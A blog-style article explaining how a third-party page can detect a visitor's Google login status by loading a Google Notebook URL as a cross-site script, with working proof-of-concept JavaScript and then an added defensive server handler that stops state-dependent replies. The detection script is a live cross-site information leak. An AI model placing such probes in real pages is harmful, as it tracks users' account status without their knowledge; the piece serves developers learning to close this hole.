Are you logged into Google right now? This question, posed by JavaScript guru Kent Brewster, comes from his series of eye-opening How-to-tell studies. Earlier, we saw Kent's hack of Netflix's JavaScript (he has already tackled Twitter and Facebook). Now it's Google's turn. Let’s take a look at his article: *How to Tell if a User is Logged In to Google*.
The article explains the approach: "What we're looking for is a URL on the target domain that returns a script which varies depending on the user's login status." Such a URL gives a third-party page a small avenue for obtaining this information. And it works as intended: if you visit his page, you will see information about your login status on Google.
This short snippet of source code exposes some risks inherent in client-side JavaScript. Aggregation applications could run a check like this without drawing your attention. In summary, his series of experiments offers two critical pieces of advice for developers:
- Do not return live JavaScript code that depends on the user's login status.
- Any URL can be included as a script tag and used to detect your status information. If your browser throws different error messages based on your user state, then you may be leaking information.
Another useful tip for developers mentioned in the article is: "Tamper Data is your faithful friend." This is a Mozilla extension that allows you to view and modify HTTP/HTTPS headers and submitted parameters, track and time HTTP requests/responses, and security-test web applications.
Let's take a closer look at how it's done.
First, two URLs on Google were found that depend on the user's status:
One is `http://www.google.com/notebook/read`.
Another is `http://www.google.com/notebook/write`.
- If you are logged into Google and have activated the "NoteBook" application, it returns: `T();`.
- If you are logged into Google but have not activated the "NoteBook" application, it returns: `L('https://www.google.com/accounts/NewServiceAccount?service=notebook&continue=http%3A%2F%2Fwww.google.com%2Fnotebook%2F&followup=http%3A%2F%2Fwww.google.com%2Fnotebook%2F&hl=en');`.
- If you are not logged into Google, it returns: `L('https://www.google.com/accounts/ServiceLogin?service=notebook&passive=true&nui=1&continue=http%3A%2F%2Fwww.google.com%2Fnotebook%2F&followup=http%3A%2F%2Fwww.google.com%2Fnotebook%2F&hl=en');`.
With that, the following script can determine your login status on Google:
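```html
<p id="status">Checking your Google login status.</p>
<script type="text/javascript">
// L(url) is the callback the response invokes with a redirect URL
// when the user is logged out or has no Notebook account.
var L = function(url) {
  if (url.match(/ServiceLogin/)) {
    // A redirect to ServiceLogin means there is no Google session.
    document.getElementById('status').innerHTML =
      'You are not logged in to Google.';
  } else {
    // A redirect to NewServiceAccount means logged in, Notebook not activated.
    document.getElementById('status').innerHTML =
      'You are logged in to Google.';
  }
};
// T() is the callback the response invokes when Notebook is active.
var T = function() {
  document.getElementById('status').innerHTML =
    'You are logged in to Google. ' +
    'Oh, and you have a Google Notebook account.';
};
// Load the state-dependent URL as a script so its response runs in this page.
var s = document.createElement('SCRIPT');
s.type = 'text/javascript';
s.src = 'http://www.google.com/notebook/read';
document.getElementsByTagName('BODY')[0].appendChild(s);
</script>
```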
This demonstrates how a simple script can check whether a user is logged into Google and even detect additional account-specific details like having a Google Notebook account.
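A server-side counterpart to the two pieces of advice above, as an added example that is not from Kent's article or from Google's code: a hypothetical `statusResponse` handler that answers with non-executable JSON and gives a script-tag include the same reply whatever the login state. The function names, the `X-Requested-With` marker check, and the sample requests are assumptions constructed for illustration.

```javascript
// Added example: hypothetical handler for a login-status endpoint (names are assumptions).
const BASE_HEADERS = {
  'Content-Type': 'application/json; charset=utf-8', // data, not live JavaScript
  'X-Content-Type-Options': 'nosniff',               // browser must not treat it as script
  'Cross-Origin-Resource-Policy': 'same-origin',
  'Cache-Control': 'no-store',
};

// Decide from the request headers first; consult the session only afterwards.
function statusResponse(reqHeaders, session) {
  const h = {};
  for (const [k, v] of Object.entries(reqHeaders)) h[k.toLowerCase()] = v;

  // Fetch Metadata (modern browsers): refuse cross-site or script-destination loads.
  const site = h['sec-fetch-site'];
  const crossSite = site !== undefined && site !== 'same-origin';
  const asScript = h['sec-fetch-dest'] === 'script';
  // Fallback for browsers without Fetch Metadata: <script src> cannot set custom headers.
  const hasMarker = h['x-requested-with'] === 'XMLHttpRequest';

  if (crossSite || asScript || !hasMarker) {
    // The session has not been read yet, so this reply is identical in every login state.
    return { status: 403, headers: BASE_HEADERS, body: '{"error":"forbidden"}' };
  }
  const state = !session ? 'anonymous' : session.notebook ? 'notebook' : 'logged-in';
  return { status: 200, headers: BASE_HEADERS, body: JSON.stringify({ state }) };
}

// Constructed sample inputs: the article's three user states and three request shapes.
const SESSIONS = [null, { notebook: false }, { notebook: true }];
const SCRIPT_TAG_REQ = { 'Sec-Fetch-Site': 'cross-site', 'Sec-Fetch-Dest': 'script' };
const LEGACY_SCRIPT_REQ = {}; // older browser: no Fetch Metadata, no custom header
const SAME_ORIGIN_XHR = {
  'Sec-Fetch-Site': 'same-origin',
  'Sec-Fetch-Dest': 'empty',
  'X-Requested-With': 'XMLHttpRequest',
};

// Number of distinct replies across the three states; anything above 1 leaks state.
function distinctReplies(reqHeaders) {
  return new Set(SESSIONS.map(s => JSON.stringify(statusResponse(reqHeaders, s)))).size;
}

console.log(distinctReplies(SCRIPT_TAG_REQ), distinctReplies(LEGACY_SCRIPT_REQ),
            distinctReplies(SAME_ORIGIN_XHR));
```

Because the status code and body of the refusal are fixed before the session is read, a script tag's load or error behaviour cannot differ by user state either.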